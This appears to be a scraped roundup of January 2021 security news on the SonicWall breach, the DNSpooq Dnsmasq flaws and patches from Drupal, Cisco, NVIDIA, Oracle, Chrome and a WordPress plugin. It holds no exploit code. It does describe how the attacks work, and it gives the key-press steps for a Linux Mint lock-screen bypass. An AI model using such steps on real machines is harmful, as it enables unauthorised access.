Not affected by the hack are SonicWall’s lineup of firewall products, the company’s SMA 1000 series, SonicWall SonicWave access points (APs) and the NetExtender VPN client. Initially, in its Friday disclosure SonicWall had identified the NetExtender 10.X VPN client as potentially being targeted by attackers – however, the company said that has now been ruled out.
“[NetExtender] may be used with all SonicWall products,” according to the company. “No action is required from customers or partners.”
Further information about the cyberattack itself is not available at this time; when asked by Threatpost for further comment a SonicWall spokesperson said the only information it will currently divulge is within its security alert. On Monday, SonicWall said on Twitter said that it will provide another update on the attack “within 24 hours” and is “committed to transparency during our ongoing investigations.”
SonicWall said it has recently tracked a dramatic surge in cyberattacks on governments and businesses, specifically on firms that provide critical infrastructure and security controls to those organizations. The recent cyberattack also comes during a surge in remote workforces due to the COVID-19 pandemic. The presence of vulnerabilities in remote access products gives attackers the abilities to tap into the increased number of remote employees.
In October 2020, SonicWall disclosed a critical security bug in its SonicWall VPN portal that can be used to crash the device and prevent users from connecting to corporate resources. It could also open the door to remote code execution (RCE), researchers said. And in 2018, researchers discovered variants of the Mirai and Gafgyt IoT botnets targeting well-known vulnerabilities in SonicWall.
SonicWall Says Internal Systems Targeted by Hackers Exploiting Zero-Day Flaws
24.1.2021
Vulnerebility
Securityweek
Cybersecurity firm SonicWall said late on Friday that some of its internal systems were targeted by “highly sophisticated threat actors” exploiting what appear to be zero-day vulnerabilities affecting some of the company’s products.
SonicWall provides network, access, email, cloud, and endpoint security solutions. The company said the attackers may have exploited zero-day vulnerabilities in some of its secure remote access products, namely NetExtender VPN client version 10.x, which is used to connect to Secure Mobile Access (SMA) 100 series appliances and SonicWall firewalls, as well as SMA version 10.x running on SMA 200, 210, 400 and 410 physical appliances or the SMA 500v virtual appliance.
SonicWall has issued an alert with recommendations on what users of the impacted products should do to prevent potential attacks until patches are made available.
The company described the incident as a “coordinated attack.”
Before the news broke, SecurityWeek received an anonymous email claiming that SonicWall was hit by ransomware and that hackers managed to steal “all customer data.”
A second anonymous email said all internal systems went down on Tuesday at SonicWall and that the attackers left a message on Wednesday asking to be contacted by the company’s CEO. The same individual also claimed all source code was stolen from SonicWall’s GitLab repository as a result of the breach.
A screenshot described as proof that the hackers had full access to all internal systems at SonicWall only showed the results of a search conducted using the Shodan search engine.
SonicWall has not shared any information about ransomware or what type of data may have been compromised, and SecurityWeek has not been able to independently confirm the claims — they could be false claims that may have nothing to do with the actual breach suffered by SonicWall.
Drupal fixed a new flaw related PEAR Archive_Tar library
23.1.2021
Vulnerebility
Securityaffairs
Drupal development team released security updates to address a vulnerability
that resides in the PEAR Archive_Tar third-party library.
The Drupal
development team has released security updates to address the CVE-2020-36193
vulnerability in the PEAR Archive_Tar third-party library.
The PEAR Archive_Tar class provides handling of tar files in PHP. It supports creating, listing, extracting, and adding to tar files.
The developers released core patches for the version 9.1, 9.0, 8.9, and 7 of the popular CMS.
The CVE-2020-36193 flaw is caused by the improper check of symbolic links, leading to Tar.php in Archive_Tar allowing for write operations with directory traversal.
“The Drupal project uses the pear Archive_Tar library, which has released a security update that impacts Drupal.” reads the advisory.
The flaw could be exploited by attackers if the CMS is configured to allow for the upload and processing of .tar, .tar.gz, .bz2, or .tlz files.
The flaw affects Archive_Tar through version 1.4.11, the issue was fixed by disallowing symlinks to out-of-path filenames.
According to the advisory published by Drupal, the flaw could be mitigated by disabling uploads of .tar, .tar.gz, .bz2, or .tlz files.
The development team recommends to install the latest version
If you are using version 9.1, update to Drupal 9.1.3.
If you are using
version 9.0, update to Drupal 9.0.11.
If you are using version 8.9, update to
8.9.13.
If you are using version 7, update to 7.78.
Versions of Drupal 8
prior to 8.9.x are end-of-life and do not receive security coverage.
The CVE-2020-36193 vulnerability is linked to the CVE-2020-28948 flaw that was fixed by the developers in November with the release of emergency security updates.
Beware! Fully-Functional Released Online for SAP Solution Manager Flaw
23.1.2021
Vulnerebility
Thehackernews
Cybersecurity
researchers have warned of a publicly available fully-functional exploit that
could be used to target SAP enterprise software.
The exploit leverages a vulnerability, tracked as CVE-2020-6207, that stems from a missing authentication check in SAP Solution Manager (SolMan) version 7.2
SAP SolMan is an application management and administration solution that offers end-to-end application lifecycle management in distributed environments, acting as a centralized hub for implementing and maintaining SAP systems such as ERP, CRM, HCM, SCM, BI, and others.
password auditor
"A successful exploitation could allow a remote
unauthenticated attacker to execute highly privileged administrative tasks in
the connected SAP SMD Agents," researchers from Onapsis said, referring to the
Solution Manager Diagnostics toolset used to analyze and monitor SAP systems.
The vulnerability, which has the highest possible CVSS base score of 10.0, was addressed by SAP as part of its March 2020 updates.
Exploitation methods leveraging the flaw were later demonstrated at the Black
Hat conference last August by Onasis researchers Pablo Artuso and Yvan Genuer to
highlight possible attack techniques that could be devised by rogue parties to
strike SAP servers and obtain root access.
The critical flaw resided in SolMan's User Experience Monitoring (formerly End-user Experience Monitoring or EEM) component, thus putting every business system connected to the Solution Manager at risk of a potential compromise.
The public availability of a Proof-of-Concept (PoC) exploit code, therefore, leaves unpatched servers exposed to a number of potential malicious attacks, including:
Shutting down any SAP system in the landscape
Causing IT to control
deficiencies impacting financial integrity and privacy, leading to regulatory
compliance violations
Deleting any data in the SAP systems, causing business
disruptions
Assigning superuser privileges to any existing or new user,
allowing those users to run critical operations, and
Reading sensitive data
from the database
"While exploits are released regularly online, this hasn't
been the case for SAP vulnerabilities, for which publicly available exploits
have been limited," Onasis researchers said.
"The release of a public exploit significantly increases the chance of an attack attempt since it also expands potential attackers not only to SAP-experts or professionals, but also to script-kiddies or less-experienced attackers that can now leverage public tools instead of creating their own."
Exclusive: SonicWall Hacked Using 0-Day Bugs In Its Own VPN Product
23.1.2021
Vulnerebility
Thehackernews
SonicWall, a popular
internet security provider of firewall and VPN products, on late Friday
disclosed that it fell victim to a coordinated attack on its internal systems.
The San Jose-based company said the attacks leveraged zero-day vulnerabilities in SonicWall secure remote access products such as NetExtender VPN client version 10.x and Secure Mobile Access (SMA) that are used to provide users with remote access to internal resources.
"Recently, SonicWall identified a coordinated attack on its internal systems by highly sophisticated threat actors exploiting probable zero-day vulnerabilities on certain SonicWall secure remote access products," the company exclusively told The Hacker News.
password auditor
The development comes after The Hacker News received reports
that SonicWall's internal systems went down earlier this week on Tuesday and
that the source code hosted on the company's GitLab repository was accessed by
the attackers.
SonicWall wouldn't confirm beyond the reports beyond the statement, adding it would provide additional updates as more information becomes available.
The complete list of affected products include:
NetExtender VPN client version 10.x (released in 2020) utilized to connect to
SMA 100 series appliances and SonicWall firewalls
Secure Mobile Access (SMA)
version 10.x running on SMA 200, SMA 210, SMA 400, SMA 410 physical appliances,
and the SMA 500v virtual appliance
The company said its SMA 1000 series is
not susceptible to the zero-days and that it utilizes clients different from
NetExtender.
It has also published an advisory urging organizations to enable multi-factor authentication, disable NetExtender access to the firewall, restrict access to users and admins for public IP addresses, and configure whitelist access on the SMA directly to mitigate the flaws.
With a number of cybersecurity vendors such as FireEye, Microsoft, Crowdstrike, and Malwarebytes becoming targets of cyberattacks in the wake of SolarWinds supply chain hack, the latest breach of SonicWall raises significant concerns.
"As the front line of cyber defense, we have seen a dramatic surge in cyberattacks on governments and businesses, specifically on firms that provide critical infrastructure and security controls to those organizations," SonicWall said.
(This is a developing story. We will update it as and when more updates are available.)
Cisco fixed multiple flaws in Cisco SD-WAN products and Smart Software Manager Satellite Web UI
22.1.2021 Vulnerebility Securityaffairs
Cisco fixed multiple flaws in Cisco SD-WAN products that could allow an
unauthenticated, remote attacker to execute attacks against its devices.
Cisco released security updates to address multiple flaws in Cisco SD-WAN
products could allow an unauthenticated, remote attacker to execute attacks
against vulnerable devices.
These vulnerabilities impact devices running the following Cisco SD-WAN Software:
IOS XE SD-WAN Software
SD-WAN vBond Orchestrator Software
SD-WAN vEdge
Cloud Routers
SD-WAN vEdge Routers
SD-WAN vManage Software
SD-WAN
vSmart Controller Software
The first issue, tracked as CVE-2021-1300, is a
Cisco SD-WAN buffer overflow vulnerability that could be exploited by an
unauthenticated, remote attacker to trigger a buffer overflow condition.
“A vulnerability in Cisco SD-WAN Software could allow an unauthenticated, remote attacker to cause a buffer overflow condition.” reads the security advisory. “A successful exploit could allow the attacker to execute arbitrary code on the underlying operating system with root privileges.”
The vulnerability stems from the incorrect handling of IP traffic. An attacker can trigger the flaw by sending crafted IP traffic through an affected device, which may cause a buffer overflow when the traffic is processed. The flaw has been rated with a CVSS Base Score of 9.8.
The IT giant said that there are no workarounds that address this vulnerability.
The second flaw addressed by the company is a Cisco SD-WAN buffer overflow vulnerability tracked as CVE-2021-1301.
A flaw resides in the NETCONF subsystem, an authenticated, remote attacker could exploit the vulnerability to trigger a denial of service (DoS) condition on an affected device or system.
The vulnerability is caused by the insufficient input validation of user-supplied input that is read by the system during the establishment of an SSH connection.
“An attacker could exploit this vulnerability by submitting a crafted file to be read by the affected system. A successful exploit could allow the attacker to cause a buffer overflow that could result in a DoS condition on the affected device or system.” states the advisory.
The flaw has been rated with a CVSS Base Score of 6.5, the company said that are no workarounds that address this vulnerability.
Cisco also addressed critical Command Injection vulnerabilities in Smart Software Manager Satellite Web UI.
The flaws, tracked as CVE-2021-1138, CVE-2021-1140, and CVE-2021-1142, affect Cisco Smart Software Manager Satellite releases 5.1.0 and earlier and have been fixed with the release of versions 6.3.0 and later.
“Multiple vulnerabilities in the web UI of Cisco Smart Software Manager Satellite could allow an unauthenticated, remote attacker to execute arbitrary commands on the underlying operating system.” reads the advisory.
The Cisco Product Security Incident Response Team (PSIRT) is not aware of public announcements or threat actors exploiting the above issues in attacks in the wild.
Drupal Updates Patch Another Vulnerability Related to Archive Files
22.1.2021
Vulnerebility
Securityweek
Security updates released this week by the developers of the Drupal content management system (CMS) patch a vulnerability identified in a third-party library.
Core patches were made available for Drupal 9.1, 9.0, 8.9, and 7, to resolve a security flaw affecting PEAR Archive_Tar, and which also impacts Drupal. The third-party library has been designed to support the handling of .tar files in PHP.
Tracked as CVE-2020-36193, the issue exists because symbolic links aren’t properly checked, leading to Tar.php in Archive_Tar allowing for write operations with directory traversal.
The bug impacts Archive_Tar through version 1.4.11 and it was addressed by disallowing symlinks to out-of-path filenames.
The Drupal development team explains that attackers could exploit the vulnerability if the CMS is configured to allow for the upload and processing of .tar, .tar.gz, .bz2, or .tlz files.
Thus, to mitigate the issue, users could disable uploading of .tar, .tar.gz, .bz2, or .tlz files.
Patches were included in Drupal releases 9.1.3, 9.0.11, 8.9.13, and 7.78. No security patches are available for Drupal 8 prior to 8.9.x, as those releases have reached end-of-life.
The newly addressed vulnerability is related to CVE-2020-28948, an issue in the same third-party library that could have been abused for the execution of arbitrary PHP code or to overwrite files, and which also impacted Drupal deployments configured to allow .tar, .tar.gz, .bz2 or .tlz file uploads.
In late November, Drupal released out-of-band security updates to resolve the vulnerability, after the researcher who reported the issue released proof-of-concept (PoC) exploits.
Drupal rated both CVE-2020-36193 and CVE-2020-28948 as ‘critical’, but its use of the NIST Common Misuse Scoring System means that ‘critical’ is the second highest severity rating, after ‘highly critical’.
Cisco Patches Critical Vulnerabilities in SD-WAN, DNA Center, SSMS Products
22.1.2021
Vulnerebility
Securityweek
Cisco this week released patches to address a significant number of vulnerabilities across its product portfolio, including several critical flaws in SD-WAN products, DNA Center, and Smart Software Manager Satellite (SSMS).
Several command injection bugs addressed in SD-WAN products could allow an attacker to perform actions as root on the affected devices, the most important of which is rated critical severity, featuring a CVSS score of 9.9.
Tracked as CVE-2021-1299, the flaw resides in the web-based management interface of SD-WAN vManage software and could be exploited remotely, without authentication, to execute arbitrary commands as the root user. An attacker looking to exploit the flaw would have to submit crafted input to the device template configuration.
Five other command injection flaws were addressed in SD-WAN vBond Orchestrator, SD-WAN vEdge Cloud Routers, SD-WAN vEdge Routers, SD-WAN vManage, and SD-WAN vSmart Controller Software. Two of them were rated high severity, while the other three were considered medium severity.
Cisco also patched two buffer overflow issues in SD-WAN, the most important of which is tracked as CVE-2021-1300 and features a CVSS score of 9.8. The flaw could lead to arbitrary code execution with root privileges.
Impacted products include IOS XE SD-WAN, SD-WAN vBond Orchestrator, SD-WAN vEdge Cloud Routers, SD-WAN vEdge Routers, SD-WAN vManage, and SD-WAN vSmart Controller software.
A critical vulnerability addressed in DNA Center could be exploited to perform command injection attacks. Tracked as CVE-2021-1264 and featuring a CVSS score of 9.6, the flaw exists because of insufficient input validation by the Command Runner tool. Cisco DNA Center releases prior to version 1.3.1.0 are affected.
Three critical bugs (CVE-2021-1138, CVE-2021-1140, CVE-2021-1142; CVSS score of 9.8) were patched in the web UI of Smart Software Manager Satellite. The flaws could be exploited by an unauthenticated, remote attacker to execute arbitrary commands.
Two other issues (CVE-2021-1139, CVE-2021-1141; CVSS score of 8.8) also addressed in the software could be exploited remotely, without authentication, to execute arbitrary commands as the root user. Cisco Smart Software Manager On-Prem releases 6.3.0 and later contain fixes for all of these flaws.
Cisco says it is not aware of public exploits or attacks that target any of these vulnerabilities.
This week, the company also released patches for multiple other high- and medium-severity flaws in SD-WAN, DNA Center, Data Center Network Manager, SSMS, Advanced Malware Protection (AMP) for Endpoints for Windows and Immunet for Windows, Web Security Appliance (WSA), Umbrella, Unified Communications products, Elastic Services Controller (ESC), Email Security Appliance (ESA), Content Security Management Appliance (SMA), and StarOS.
Information on all of the addressed vulnerabilities can be found on Cisco’s security portal.
NVIDIA Gamers Face DoS, Data Loss from Shield TV Bugs
21.1.2021
Vulnerebility
Threatpost
The company also issued patches for Tesla-based GPUs as part of an updated, separate security advisory.
NVIDIA has newly disclosed three security vulnerabilities in the NVIDIA Shield TV, which could allow denial of service, escalation of privileges and data loss.
The NVIDIA Shield TV is a set-top gadget that acts as a hub for the smart home, streams PC games from a gaming PC to a TV; and allows local and online media playback and streaming. Android games compatible with Android TV are compatible with the Shield TV and controller, as are those from the NVIDIA’s GeoForce market.
Separately, NVIDIA issued an updated security advisory for a cluster of security bugs in NVIDIA’s video-friendly graphics processing unit (GPU) Display Driver. These could plague Linux gamers and others with denial of service, escalation of privileges and information disclosure.
NVIDIA Shield TV Bugs
When it comes to the internet-of-things (IoT) device
known as Shield TV, one high-severity bug (CVE‑2021‑1068) exists in the NVDEC
component of the gadget, which is a hardware-based decoder. It arises because an
attacker can read from or write to a memory location that is outside the
intended boundary of the buffer, which may lead to denial of service or
escalation of privileges. It carries a 7.8 CVSS rating.
The other two bugs are medium-severity. The flaw tracked as CVE‑2021‑1069 exists in the NVHost function, and could lead to an abnormal reboot due to a null pointer reference, causing data loss.
Another, CVE‑2021‑1067 exists in the implementation of the RPMB command status, in which an attacker can write to the Write Protect Configuration Block, which may lead to denial of service or escalation of privileges.
To protect a system, users can download and install a software update through the update notification that will appear on the Home Screen, or by going to Settings>About>System update.
NVIDIA GPU Display Driver Kernel Bugs
Earlier in January, Nvidia patched
flaws tied to 16 CVEs across its graphics drivers and vGPU software, in its
first security update of 2021. An updated security advisory now includes the
availability of patched Linux drivers for the Tesla line of GPUs, affecting
CVE-2021-1052, CVE-2021-1053 and CVE-2021-1056.
Tesla as a line of GPU accelerator boards optimized for high-performance, general-purpose computing. They are used for parallel scientific, engineering, and technical computing, and they are designed for deployment in supercomputers, clusters and workstations.
The patches address one high-severity issue (CVE‑2021‑1052) in the graphics driver, which is the software component that enables a device’s operating system and programs to use NVIDIA’s high-level, gaming- and science-optimized graphics hardware.
found in the Linux kernel mode layer (nvlddmkm.sys) handler for DxgkDdiEscape or IOCTL. Here, “user-mode clients can access legacy privileged APIs, which may lead to denial of service, escalation of privileges and information disclosure,” according to the company.
The other two Linux issues rate medium-severity. The first (CVE‑2021‑1053) also affects the kernel mode layer (nvlddmkm.sys) handler for DxgkDdiEscape or IOCTL, in which improper validation of a user pointer may lead to denial of service.
The second medium bug (CVE‑2021‑1056) is a vulnerability in the kernel mode layer (nvidia.ko) in which it does not completely honor operating system file system permissions to provide GPU device-level isolation, which may lead to denial of service or information disclosure.
Full details on all of the GPU vulnerabilities are available in the security
bulletin. Patched versions are as follows:
NVIDIA’s Line of Security Bugs
This is not NVIDIA’s first patching rodeo.
Last year, the company issued its fair share of patches; including fixes for two high-severity flaws in the Windows version of its GeForce Experience software, and a patch for a critical bug in its high-performance line of DGX servers, both in October; and a high-severity flaw in its GeForce NOW application software for Windows in November.
Oracle's January 2021 CPU Contains 329 New Security Patches
21.1.2021
Vulnerebility
Securityweek
Oracle this week announced the availability of its first cumulative set of security fixes for 2021, which includes a total of 329 new patches.
The January 2021 Critical Patch Update (CPU) addresses issues in both Oracle products and third-party components that are included in the company’s products, with some of the patches meant to address multiple vulnerabilities, some reported more than a year ago.
The January 2021 CPU also includes fixes for CVE-2020-14750, an exploited vulnerability in WebLogic Server, which Oracle addressed with the release of an out-of-band update on November 1, 2020.
Oracle’s quarterly collection of patches brings fixes for more than 20 products across the tech giant’s portfolio, with Fusion Middleware being affected the most: it received 60 patches, with 47 of the resolved vulnerabilities being remotely exploitable, without authentication.
Financial Services Applications comes in second, with a total of 50 fixes and 41 vulnerabilities that unauthenticated attackers can exploit remotely, followed by MySQL at 43 patches and 5 remotely exploitable, without authentication.
Retail Applications, with 32 patches and 20 vulnerabilities that can be exploited remotely without authentication, and E-Business Suite, with 31 fixes and 29 bugs remotely exploitable by unauthenticated attackers, round up the top five most impacted products.
Virtualization received 17 patches this month, but none of the addressed vulnerabilities could be exploited remotely without authentication. However, all of those addressed by the 11 fixes released for Supply Chain could be.
Oracle also released patches for Communications (12 fixes – 7 flaws remotely exploitable without authentication), Enterprise Manager (8 – 8), PeopleSoft (8 – 6), Communications Applications (8 – 6), Database Server (8 – 1), Construction and Engineering (7 – 5), Hyperion (7 – 5), JD Edwards (5 – 5), Health Sciences Applications (5 – 3), Systems (4 – 3), Siebel CRM (4 – 1), Insurance Applications (3 – 1), GraalVM (2 – 2), Food and Beverage Applications (2 – 1), Java SE (1 – 1), and Utilities Applications (1 – 1).
The tech company says that it continues to receive reports of threat actors attempting to exploit patched vulnerabilities, and it has advised customers to install the available updates as soon as possible, to ensure they are protected from such attacks.
Oracle’s next set of quarterly patches will be released on April 20, 2021.
Chrome 88 Drops Flash, Patches Critical Vulnerability
21.1.2021
Vulnerebility
Securityweek
Google has released Chrome 88 to the stable channel with several security improvements inside, including patches for 36 vulnerabilities, one of which is rated critical severity, and dropped support for Adobe Flash.
The removal of Flash support isn’t surprising, considering that the software reached end-of-life on December 31, 2020, and Adobe started blocking Flash content last week.
Chrome 88 also arrived with improved password protections, including a check that helps users identify weak passwords and immediately act upon the issue, to ensure better protection of their accounts.
Starting with the new browser release, password management is even easier in the Chrome settings on desktop and iOS. Chrome was already prompting users to update their saved passwords at login, and now updating multiple usernames and passwords has been simplified, the Internet search giant says.
The new browser iteration arrives with patches for a total of 36 vulnerabilities, 26 of which were reported by external researchers. The flaws can be exploited if the user visits or is redirected to a specially crafted webpage.
The most important of these is CVE-2021-21117, an insufficient policy enforcement issue in Cryptohome that was rated critical severity. Exploitation of the bug could result in arbitrary code execution in the context of the browser, the Multi-State Information Sharing and Analysis Center (MS-ISAC) notes in an advisory.
The issue was reported by Rory McNamara, who received a $30,000 bug bounty reward for the discovery.
A total of nine vulnerabilities rated high severity were reported by external researchers, with use-after-free being the most frequent bug type (six of the vulnerabilities). Two high-risk insufficient data validation flaws and one insufficient policy enforcement were also addressed.
Six of the ten medium-severity flaws reported externally were insufficient policy enforcement bugs, accompanied by two inappropriate implementations, one heap buffer overflow, and one incorrect security UI issue.
Chrome 88 also addresses six low-severity vulnerabilities reported by external researchers.
Google says it paid more than $80,000 in bug bounties to the reporting researchers, but the company hasn’t disclosed all of the reward amounts yet.
The latest stable version of Chrome is 88.0.4324.96 and is currently rolling out to Windows, Mac and Linux users.
A Set of Severe Flaws Affect Popular DNSMasq DNS Forwarder
20.1.2021
Vulnerebility
Thehackernews
Cybersecurity researchers have uncovered multiple vulnerabilities in Dnsmasq, a
popular open-source software used for caching Domain Name System (DNS)
responses, thereby potentially allowing an adversary to mount DNS cache
poisoning attacks and remotely execute malicious code.
The seven flaws, collectively called "DNSpooq" by Israeli research firm JSOF, echoes previously disclosed weaknesses in the DNS architecture, making Dnsmasq servers powerless against a range of attacks.
"We found that Dnsmasq is vulnerable to DNS cache poisoning attack by an off-path attacker (i.e., an attacker that does not observe the communication between the DNS forwarder and the DNS server)," the researchers noted in a report published today.
"Our attack allows for poisoning of multiple domain names at once, and is a result of several vulnerabilities found. The attack can be completed successfully under seconds or few minutes, and have no special requirements. We also found that many instances of Dnsmasq are misconfigured to listen on the WAN interface, making the attack possible directly from the Internet."
Dnsmasq, short for DNS masquerade, is a lightweight software with DNS forwarding capabilities used for locally caching DNS records, thus reducing the load on upstream nameservers and improving performance.
As of September 2020, there were about 1 million vulnerable Dnsmasq instances, JSOF found, with the software included in Android smartphones and millions of routers and other networking devices from Cisco, Aruba, Technicolor, Redhat, Siemens, Ubiquiti, and Comcast.
Revisiting Kaminsky Attack and SAD DNS
The concept of DNS cache poisoning is
not new.
In 2008, security researcher Dan Kaminsky presented his findings of a widespread and critical DNS vulnerability that allowed attackers to launch cache poisoning attacks against most nameservers.
It exploited a fundamental design flaw in DNS — there can be only 65,536 possible transaction IDs (TXIDs) — to flood the DNS server with forged responses, which is then cached and leveraged to route users to fraudulent websites.
The transaction IDs were introduced as a mechanism to thwart the possibility that an authoritative nameserver could be impersonated to craft malicious responses. With this new setup, DNS resolvers attached a 16-bit ID to their requests to the nameservers, which would then send back a response with the same ID.
But the limitation in transaction IDs meant that whenever a recursive resolver
queries the authoritative nameserver for a given domain (e.g., www.google.com),
an attacker could flood the resolver with DNS responses for some or all of the
65 thousand or so possible transaction IDs.
If the malicious answer with the right transaction ID from the attacker arrives before the response from the authoritative server, then the DNS cache would be effectively poisoned, returning the attacker's chosen IP address instead of the legitimate address for as long as the DNS response was valid.
The attack banked on the fact that the entire lookup process is unauthenticated, meaning there is no way to verify the identity of the authoritative server, and that DNS requests and responses use UDP (User Datagram Protocol) instead of TCP, thereby making it easy to spoof the replies.
To counter the problem, a randomized UDP port was used as a second identifier along with the transaction ID, as opposed to just using port 53 for DNS lookups and responses, thus raising the entropy in the order of billions and making it practically infeasible for attackers to guess the correct combination of the source port and the transaction ID.
Although the effectiveness of cache poisoning attacks has taken a hit due to the aforementioned source port randomization (SPR) and protocols such as DNSSEC (Domain Name System Security Extensions), researchers last November found a "novel" side-channel to defeat the randomization by using ICMP rate limits as a side-channel to reveal whether a given port is open or not.
The attacks — named "SAD DNS" or Side-channel AttackeD DNS — involves sending a burst of spoofed UDP packets to a DNS resolver, each sent over a different port, and subsequently using ICMP "Port Unreachable" messages (or lack thereof) as an indicator to discern if the rate limit has been met and eventually narrow down the exact source port from which the request originated.
Mount Multi-Staged Attacks That Allow Device Takeover
Interestingly, the DNS
cache poisoning attacks detailed by JSOF bear similarities to SAD DNS in that
the three vulnerabilities (CVE-2020-25684, CVE-2020-25685, and CVE-2020-25686)
aim to reduce the entropy of the Transaction IDs and source port that are
required for a response to be accepted.
Specifically, the researchers noted that despite Dnsmasq's support for SPR, it "multiplexes multiple TXIDs on top of one port and does not link each port to specifics TXIDs," and that the CRC32 algorithm used for preventing DNS spoofing can be trivially defeated, leading to a scenario where "the attacker needs to get any one of the ports right and any one of the TXIDs right."
Dnsmasq versions 2.78 to 2.82 were all found to be affected by the three flaws.
The other four vulnerabilities disclosed by JSOF are heap-based buffer
overflows, which can lead to potential remote code execution on the vulnerable
device.
"These vulnerabilities, in and of themselves, would have limited risk, but become especially powerful since they can be combined with the cache-poisoning vulnerabilities to produce a potent attack, allowing for remote code execution," the researchers said.
Even worse, these weaknesses can be chained with other network attacks such as SAD DNS and NAT Slipstreaming to mount multi-staged attacks against Dnsmasq resolvers listening on port 53. Even those that are configured to only listen to connections received from within an internal network are at risk if the malicious code gets transmitted via web browsers or other infected devices on the same network.
Besides rendering them susceptible to cache poisoning, the attacks can also permit a bad actor to take control over routers and networking equipment, stage distributed denial-of-service (DDoS) attacks by subverting traffic to a malicious domain, and even prevent users from accessing legitimate sites (reverse DDoS).
The researchers also raised the possibility of a "wormable attack" wherein mobile devices connected to a network that uses an infected Dnsmasq server receives a bad DNS record and is then used to infect a new network upon connecting to it.
Update Dnsmasq to 2.83
It's highly recommended that vendors update their
Dnsmasq software to the latest version (2.83 or above) that will be released
later today in order to mitigate the risk.
As workarounds, researchers suggest lowering the maximum queries allowed to be forwarded, as well as rely on DNS-over-HTTPS (DoH) or DNS-over-TLS (DoT) to connect to the upstream server.
"DNS is an Internet-critical protocol whose security greatly affect[s] the security of Internet users," the researchers concluded. "These issues put networking devices at risk of compromise and affect millions of Internet users, which can suffer from the cache poisoning attack presented.
"This highlight[s] the importance of DNS security in general and the security of DNS forwarders in particular. It also highlights the need to expedite the deployment of DNS security measures such as DNSSEC, DNS transport security, and DNS cookies."
Critical flaws in Orbit Fox WordPress plugin allows site takeover
18.1.2021
Vulnerebility
Securityaffairs
Two vulnerabilities in the Orbit Fox WordPress plugin, a privilege-escalation
issue and a stored XSS bug, can allow site takeover.
Security experts from
Wordfence have discovered two security vulnerabilities in the Orbit Fox
WordPress plugin. The flaws are a privilege-escalation vulnerability and a
stored XSS bug that impacts over 40,000 installs.
The Orbit Fox plugin allows site administrators to add features such as registration forms and widgets, it has been installed by 400,000+ sites.
The plugin was developed by ThemeIsle, it is designed to enhance the Elementor,
Beaver Builder, and Gutenberg editors and implements additional features
Two
vulnerabilities can be exploited by attackers to inject malicious code into
websites using the vulnerable version of the plugin and take over them.
“One of these flaws made it possible for attackers with contributor level access
or above to escalate their privileges to those of an administrator and
potentially take over a WordPress site. The other flaw made it possible for
attackers with contributor or author level access to inject potentially
malicious JavaScript into posts.” reads the post published by Wordfence. “These
types of malicious scripts can be used to redirect visitors to malvertising
sites or create new administrative users, amongst many other actions.”
The
authenticated privilege-escalation flaw has been rated as critical and has
received a CVSS bug-severity score of 9.9. authenticated attackers with
contributor level access or above can escalate privileges to administrator and
potentially take over a website.
The authenticated stored cross-site scripting (XSS) issue allows attackers with
contributor or author level access to inject JavaScript into posts. An attacker
could exploit this flaw to conduct multiple malicious actions, such as
malvertising attacks. The flaw rated as medium severity has received a CVSS
score of 6.4.
Orbit Fox plugin includes a registration widget that can be
used to create a registration form with customizable fields when using the
Elementor and Beaver Builder page builder plugins. Upon creating the
registration form, the plugin will provide the ability to set a default role to
be used whenever a user registers using the form.
“Lower-level users like contributors, authors, and editors were not shown the option to set the default user role from the editor. However, we found that they could still modify the default user role by crafting a request with the appropriate parameter,” Wordfence continues. “The plugin provided client-side protection to prevent the role selector from being shown to lower-level users while adding a registration form. Unfortunately, there were no server-side protections or validation to verify that an authorized user was actually setting the default user role in a request.”
Experts pointed out that the lack of server-side validation in Orbit Fox allows lower-level users to set their role to that of an administrator upon successful registration.
“To exploit this flaw, user registration would need to be enabled and the site would need to be running the Elementor or Beaver Builder plugins,” continues Wordfence. “A site with user registration disabled or neither of these plugins installed would not be affected by this vulnerability.”
This vulnerability allowed lower-level users to add malicious JavaScript to posts that would execute in the browser whenever a user navigated to that page.
The two vulnerabilities have been addressed with the release of version 2.10.3.
Vulnerabilities in WordPress plugins are very dangerous and could allow attackers to carry out attacks on a large scale. On December, the development team behind the Contact Form 7 WordPress plugin discloses an unrestricted file upload vulnerability, the plugin has over 5 million active installs. The issue can exploit to upload a file that can be executed as a script file on the underlying server.
In November threat actors were observed actively exploiting a zero-day vulnerability in the popular Easy WP SMTP WordPress plugin installed on more than 500,000 sites.
In the same period hackers were actively exploiting a critical remote code execution vulnerability in the File Manager plugin, over 300,000 WordPress sites were potentially exposed at the time of the discovery.
Two kids found a screensaver bypass in Linux Mint
17.1.2021
Vulnerebility
Securityaffairs
The development team behind the Linux Mint distro has fixed a security flaw that
could have allowed users to bypass the OS screensaver.
The maintainers of the
Linux Mint project have addressed a security bug that could have allowed
attackers to bypass the OS screensaver.
The curious aspect of this vulnerability is related to its discovery, in fact, it was found by too children that were playing on their dad’s computer.
The process is simple and allow the screensaver lock by-pass by crashing the screensaver and unlock the desktop via the virtual keyboard.
In order to reproduce the bypass on a locked system, click on the virtual
keyboard, then type at the real keyboard while typing on the virtual keyboard,
both at the same time, as many keys as possible.
“A few weeks ago, my kids
wanted to hack my linux desktop, so they typed and clicked everywhere, while I
was standing behind them looking at them play… when the screensaver core dumped
and they actually hacked their way in! wow, those little hackers…” states a bug
report on GitHub.
“I thought it was a unique incident, but they managed to do it a second time. So
I’d consider this issue… reproducible… by kids. I tried to recreate the crash on
my own with no success, maybe because it required more than 4 little hands
typing and using the mouse on the virtual keyboard. Maybe not the best bug
report, but I’ve seen the screenlock crash twice already with my own eyes, so
its pretty real. One last thing, after the desktop is unlocked, I can’t re-lock
it again, the screensaver process is pretty dead and requires me to open a shell
and run ‘cinnamon-screensaver’ manually to get it working.”
Linux Mint lead
developer Clement Lefebvre confirmed that the bug resides in the libcaribou, the
on-screen keyboard (OSK) component that is part of the Cinnamon desktop
environment used by Linux Mint.
“We’ll most likely patch libcaribou here” wrote Lefebvre. “We have two different issues:
In all versions of Cinnamon, the on-screen keyboard (launched from the menu)
runs within the Cinnamon process and uses libcaribou. Pressing ē crashes
Cinnamon.
In versions of Cinnamon 4.2 and higher, there’s a libcaribou OSK in
the screensaver. Pressing ē there crashes the screensaver.”
The vulnerability
is triggered when users press the “ē” key on the on-screen keyboard, this causes
the crash of the Cinnamon desktop process. If the on-screen keyboard is opened
from the screensaver, the bug crashes the screensaver allowing users to access
the desktop.
The issue was introduced in the Linux Mint OS since the Xorg update to fix CVE-2020-25712 heap-buffer overflow in October. The bug affects all distributions running Cinnamon 4.2+ and any software using libcaribou.
The vulnerability was addressed with the release of a patch for Mint 19.x, Mint 20.x and LMDE 4.
Cisco says its RV routers will no longer receive updates
16.1.2021
Vulnerebility
Securityaffairs
